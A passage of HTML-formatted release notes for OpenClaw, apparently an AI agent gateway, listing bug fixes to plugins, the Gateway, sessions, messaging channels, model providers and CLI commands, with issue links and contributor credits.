<li>CLI/status: label the OpenClaw Serve/Funnel setting as <code>Tailscale exposure</code> and show daemon state separately when available, so <code>gateway.tailscale.mode: "off"</code> no longer reads like the Tailscale daemon is stopped. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329371669" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71790" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71790/hovercard" href="https://github.com/openclaw/openclaw/issues/71790">#71790</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pesvobodak/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pesvobodak">@pesvobodak</a>.</li>
<li>Plugins/Bonjour: stop ciao mDNS watchdog failures from looping forever when the advertiser stays stuck in <code>probing</code> or <code>announcing</code>; Bonjour now disables itself for the current Gateway process after repeated failed restarts while the Gateway keeps running. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291316152" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69011" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69011/hovercard" href="https://github.com/openclaw/openclaw/issues/69011">#69011</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/siddharthaagarwalofficial-ux/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/siddharthaagarwalofficial-ux">@siddharthaagarwalofficial-ux</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/FiredMosquito831/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/FiredMosquito831">@FiredMosquito831</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/spikefcz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/spikefcz">@spikefcz</a>.</li>
<li>Gateway/Fly.io: seed Control UI allowed origins from the actual runtime bind and port so CLI-driven non-loopback starts do not crash before config exists. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329508985" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71823" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71823/hovercard" href="https://github.com/openclaw/openclaw/issues/71823">#71823</a>.</li>
<li>macOS/remote SSH: keep discovered gateway hosts in <code>gateway.remote.sshTarget</code> while pinning SSH transport URLs to the local loopback tunnel, so browser automation does not regress into blocked non-loopback <code>ws://</code> endpoints. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4270922535" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67336" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67336/hovercard" href="https://github.com/openclaw/openclaw/issues/67336">#67336</a>.</li>
<li>Gateway/proxy: bootstrap env proxy dispatching from direct Gateway startup so provider and plugin network requests honor <code>HTTPS_PROXY</code>/<code>HTTP_PROXY</code> before the first embedded agent attempt runs. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329545167" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71833" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71833/hovercard" href="https://github.com/openclaw/openclaw/pull/71833">#71833</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mjamiv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mjamiv">@mjamiv</a>.</li>
<li>Plugins/runtime deps: verify clean npm installs actually place requested bundled runtime packages in the managed install root, reporting exact missing specs instead of a false successful repair. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329764229" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71883" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71883/hovercard" href="https://github.com/openclaw/openclaw/pull/71883">#71883</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Solvely-Colin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Solvely-Colin">@Solvely-Colin</a>.</li>
<li>Plugins/discovery: ignore stale <code>plugins.load.paths</code> aliases that point back at packaged bundled plugin directories and have doctor remove them, keeping bundled plugins on the runtime-deps staging path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codex">@codex</a>.</li>
<li>Models/LM Studio: preserve <code>@iq*</code> quant suffixes in model refs and provider matching so <code>/model lmstudio/...@iq3_xxs</code> keeps the exact LM Studio variant. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327545635" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71474" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71474/hovercard" href="https://github.com/openclaw/openclaw/issues/71474">#71474</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327608782" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71486" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71486/hovercard" href="https://github.com/openclaw/openclaw/pull/71486">#71486</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Bartok9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Bartok9">@Bartok9</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/XinwuC/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/XinwuC">@XinwuC</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Sanjays2402/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Sanjays2402">@Sanjays2402</a>.</li>
<li>Matrix/cron: preserve the live Matrix delivery target when creating implicit announce reminder jobs so mixed-case room IDs are not reconstructed from lowercased session keys. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329391998" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71798" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71798/hovercard" href="https://github.com/openclaw/openclaw/issues/71798">#71798</a>.</li>
<li>Feishu: accept Schema 2.0 card action callbacks that report <code>context.open_chat_id</code> instead of legacy <code>context.chat_id</code>, so button callbacks no longer drop as malformed. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328732574" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71670" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71670/hovercard" href="https://github.com/openclaw/openclaw/issues/71670">#71670</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eddy1068/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eddy1068">@eddy1068</a>.</li>
<li>Feishu: keep synthetic card-action and bot-menu ids out of platform reply targets, using the real card callback message id when Feishu provides one and plain-sending otherwise. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328744083" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71673" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71673/hovercard" href="https://github.com/openclaw/openclaw/issues/71673">#71673</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eddy1068/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eddy1068">@eddy1068</a>.</li>
<li>Plugins/QQ Bot: prefer an installed QQ Bot plugin that declares it replaces the bundled <code>qqbot</code> channel, preventing duplicate <code>qqbot_channel_api</code> and <code>qqbot_remind</code> tool registration noise. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4223849801" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63102" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63102/hovercard" href="https://github.com/openclaw/openclaw/issues/63102">#63102</a>.</li>
<li>Browser automation: keep stable tab ids and labels attached when Chromium replaces the raw target after form submissions or other action-triggered navigations, and return the replacement <code>targetId</code> from <code>/act</code> when the match is provable. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4075792997" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46137" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/46137/hovercard" href="https://github.com/openclaw/openclaw/issues/46137">#46137</a>.</li>
<li>QQ Bot: make <code>qqbot_remind</code> schedule, list, and remove Gateway cron jobs directly for owner-authorized senders instead of returning <code>cronParams</code> and relying on a follow-up generic <code>cron</code> tool call. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319867451" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70865" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70865/hovercard" href="https://github.com/openclaw/openclaw/issues/70865">#70865</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320478556" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70937" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70937/hovercard" href="https://github.com/openclaw/openclaw/pull/70937">#70937</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/GaosCode/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/GaosCode">@GaosCode</a>.</li>
<li>Agents/ACP: hide <code>sessions_spawn</code> ACP runtime options unless an ACP backend is loaded, and make <code>/acp doctor</code> call out <code>plugins.allow</code> blocking bundled <code>acpx</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/Codex: keep ACP prompt/skill routing hidden unless an ACP runtime backend is available, and warn in doctor when enabled Codex plugin configs still route <code>openai-codex/*</code> models through PI. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Media delivery: avoid sending generated image attachments twice when the assistant reply already includes explicit <code>MEDIA:</code> lines for the same turn, and reject unsafe remote <code>MEDIA:</code> URLs before delivery. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Codex harness: ignore retryable app-server error notifications after Codex recovers, and preserve the real nested error message for terminal app-server failures instead of replacing it with a generic failure. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Agents/Codex: prepare native Codex sub-agent session metadata without a nested Gateway session patch and add a focused Docker smoke for the app-server sub-agent path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/subagents: keep queued subagent announces session-only when the requester has no external channel target, avoiding ambiguous multi-channel delivery failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4189037839" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59201" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59201/hovercard" href="https://github.com/openclaw/openclaw/issues/59201">#59201</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/larrylhollan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/larrylhollan">@larrylhollan</a>.</li>
<li>Image understanding: preserve configured provider-prefixed vision model metadata when callers request the model without the provider prefix, so custom image models keep their <code>input: ["text", "image"]</code> capability. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4017340728" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/33185" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/33185/hovercard" href="https://github.com/openclaw/openclaw/issues/33185">#33185</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kobe9312/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kobe9312">@Kobe9312</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/install: restore the previous plugin index records if a concurrent config write conflict interrupts install, update, or uninstall metadata commits. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/install: reject native plugin archives that do not include a valid <code>openclaw.plugin.json</code>, preventing manifestless archives from writing install records that later show missing-manifest diagnostics. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/uninstall: remove tracked managed plugin install directories even when the persisted install path differs from the default id-derived target, while still refusing deletes outside the managed extensions root. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/update: restore previous plugin index records if core update or channel setup hits a concurrent config write conflict after plugin metadata changes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/onboarding: defer channel/provider plugin install records until the owning config write commits, keeping setup failures from advancing the plugin index ahead of <code>openclaw.json</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/config: route configure and agent setup writes with pending plugin install records through the plugin index commit helper so provider onboarding metadata is not stripped by plain config writes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/channels: merge pending channel plugin install records with the existing plugin index before config writes, preserving unrelated tracked installs during channel setup, resolve, remove, and capability repair flows. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/config: defer shipped <code>plugins.installs</code> index migration during config writes until the guarded config commit window and roll it back if the config write fails before commit. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Sessions: keep embedded runtime context out of the visible user prompt by sending it as a hidden next-turn custom message, and teach doctor to repair affected 2026.4.24 transcripts with duplicated prompt-rewrite branches. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329177517" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71761" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71761/hovercard" href="https://github.com/openclaw/openclaw/issues/71761">#71761</a>.</li>
<li>Gateway/subagents: keep direct-loopback backend RPCs authenticated with the shared gateway token/password off stale CLI paired-device scope baselines, so internal calls no longer hit <code>scope-upgrade</code> pairing prompts while remote, browser, node, device-token, and explicit-device paths still require normal pairing approval. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4229478808" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63548" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63548/hovercard" href="https://github.com/openclaw/openclaw/issues/63548">#63548</a>.</li>
<li>Providers/Azure OpenAI: give deployment-scoped image generation requests a longer 600s default timeout so slow <code>gpt-image-2</code> generations can complete without a per-call <code>timeoutMs</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328916892" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71705" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71705/hovercard" href="https://github.com/openclaw/openclaw/issues/71705">#71705</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/voytas75/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/voytas75">@voytas75</a>.</li>
<li>Gateway/plugins: link source-checkout bundled runtime dependency caches instead of recursively copying <code>node_modules</code> on the gateway main thread, preventing local status, node, and skill probes from timing out during startup cache restores.</li>
<li>Skills/remote nodes: only expose remote macOS skill bins for connected nodes, clear stale bin matches when node probes fail, and include probe command, timeout, bin count, and connection state in timeout logs.</li>
<li>Skills/remote nodes: recognize <code>system.which</code> object-map responses when probing connected macOS nodes, so Linux gateways can expose macOS-only skills such as Apple Notes when the required binaries are installed remotely. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329760105" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71877" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71877/hovercard" href="https://github.com/openclaw/openclaw/issues/71877">#71877</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/miguelarios/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/miguelarios">@miguelarios</a>.</li>
<li>CLI/gateway: keep diagnostic probes from creating first-time read-only device pairings, while still reusing cached device tokens for detailed read probes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329202027" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71766" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71766/hovercard" href="https://github.com/openclaw/openclaw/issues/71766">#71766</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SunboZ/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SunboZ">@SunboZ</a>.</li>
<li>CLI/plugins: keep <code>message</code> startup, <code>channels logs</code>, <code>agents delete</code>, and <code>agents set-identity</code> off broad plugin preloading; message delivery still loads plugins when the action actually runs.</li>
<li>Image understanding: resolve configured image models such as local LM Studio vision entries before reporting <code>Unknown model</code> when the discovery registry has not registered that provider. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4261396872" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66486" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66486/hovercard" href="https://github.com/openclaw/openclaw/issues/66486">#66486</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhanggpcsu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhanggpcsu">@zhanggpcsu</a>.</li>
<li>QQ Bot: ignore self-echoed bot messages using the outbound ref-index marker, preventing mirrored replies from re-entering the agent loop while still allowing users to quote bot replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329883097" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71912" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71912/hovercard" href="https://github.com/openclaw/openclaw/issues/71912">#71912</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wangyc6003/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wangyc6003">@wangyc6003</a>.</li>
<li>Sessions: separate reset freshness from session-store <code>updatedAt</code>, so heartbeat, cron, exec, and gateway bookkeeping no longer prevent configured daily/idle resets from rolling long-running channel sessions. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4285740424" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68315" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68315/hovercard" href="https://github.com/openclaw/openclaw/issues/68315">#68315</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4232177002" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63732" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63732/hovercard" href="https://github.com/openclaw/openclaw/issues/63732">#63732</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4233422936" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63820" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63820/hovercard" href="https://github.com/openclaw/openclaw/issues/63820">#63820</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291872905" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69083" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69083/hovercard" href="https://github.com/openclaw/openclaw/issues/69083">#69083</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/maxatv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/maxatv">@maxatv</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/longhairedsi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/longhairedsi">@longhairedsi</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bradfreels/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bradfreels">@bradfreels</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/akessel56/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/akessel56">@akessel56</a>.</li>
<li>Sessions: clear queued system-event notices during <code>/new</code>, <code>/reset</code>, gateway <code>sessions.reset</code>, and daily/idle rollover so stale background updates cannot leak into the first prompt of the fresh session. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265262942" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66864" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66864/hovercard" href="https://github.com/openclaw/openclaw/issues/66864">#66864</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/opeyio/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/opeyio">@opeyio</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Magicray1217/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Magicray1217">@Magicray1217</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cedillarack/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cedillarack">@cedillarack</a>.</li>
<li>CLI/agents: keep <code>agents bind</code>, <code>agents unbind</code>, and <code>agents bindings</code> on setup-safe channel metadata paths so they do not preload bundled plugin runtimes or stage runtime dependencies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329103021" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71743" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71743/hovercard" href="https://github.com/openclaw/openclaw/issues/71743">#71743</a>.</li>
<li>Plugins/registry: preserve explicit disabled plugin records during registry migration without persisting every unused bundled plugin discovered on disk. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Windows/native: keep CLI startup and bundled provider plugin loading off Windows ESM raw-path failure paths, fixing native onboarding/install smoke on Node 24.</li>
<li>Plugins/doctor: read bundled channel doctor capabilities through the same packaged plugin directory resolver used by plugin loading, so published installs keep Matrix DM allowlist repairs on <code>channels.matrix.dm.*</code> instead of writing invalid top-level <code>dmPolicy</code> keys. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329162302" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71757" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71757/hovercard" href="https://github.com/openclaw/openclaw/issues/71757">#71757</a>.</li>
<li>Plugins/Windows: keep bundled plugin Jiti loaders off the native import path on Windows so channel plugins such as Telegram no longer crash with <code>ERR_UNSUPPORTED_ESM_URL_SCHEME</code> on <code>C:\...</code> paths. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329134759" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71749" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71749/hovercard" href="https://github.com/openclaw/openclaw/issues/71749">#71749</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/smeyer9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/smeyer9">@smeyer9</a>.</li>
<li>Providers/Ollama: use Ollama's current <code>/api/web_search</code> endpoint and honor <code>https://ollama.com</code> model-provider base URLs for Ollama Web Search. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329095399" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71741" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71741/hovercard" href="https://github.com/openclaw/openclaw/issues/71741">#71741</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/madhvidua/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/madhvidua">@madhvidua</a>.</li>
<li>Memory/Ollama: serialize Ollama memory embedding batches and add an inline batch timeout override, with longer defaults for local/self-hosted embedding providers.</li>
<li>Sessions/usage: exclude compaction checkpoint transcript snapshots from usage totals and session discovery, while keeping old checkpoint files removable.</li>
<li>CLI/agents: keep <code>openclaw agents list --json</code> on the config-only path by default, avoiding bundled plugin loading unless callers request <code>--bindings</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329088196" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71739" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71739/hovercard" href="https://github.com/openclaw/openclaw/issues/71739">#71739</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kaloster/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kaloster">@kaloster</a>.</li>
<li>Plugins/install: force plugin dependency installs to stay project-local even when inherited npm config requests global installs, so successful installs still materialize the plugin's staged <code>node_modules</code>.</li>
<li>Providers/Google: transcode Gemini TTS PCM to Opus for voice-note targets so WhatsApp and other native voice-note replies can play as voice messages.</li>
<li>TTS/WhatsApp: mark non-Opus provider output as voice-note intent so channel delivery transcodes MP3/WebM replies to Ogg/Opus PTT audio.</li>
<li>Plugins/runtime deps: reuse existing external bundled-plugin stage roots when mirrored plugin roots are inspected again, avoiding second-generation <code>openclaw-unknown-*</code> stages and repeated first-turn restaging. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328214258" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71599" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71599/hovercard" href="https://github.com/openclaw/openclaw/issues/71599">#71599</a>.</li>
<li>iOS/macOS Talk Mode: allow <code>talk.speechLocale</code> to set the speech recognition locale for non-English voice conversations. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4069022882" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44688" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44688/hovercard" href="https://github.com/openclaw/openclaw/issues/44688">#44688</a>.</li>
<li>Plugins/providers: honor explicit plugin candidate lists instead of reading a persisted registry snapshot from local state, keeping candidate-scoped provider discovery hermetic.</li>
<li>Plugins/doctor: keep bundled plugin runtime-dependency repairs inside the managed OpenClaw stage even when user npm prefix/global config points npm at <code>$HOME/node_modules</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329067622" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71730" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71730/hovercard" href="https://github.com/openclaw/openclaw/issues/71730">#71730</a>.</li>
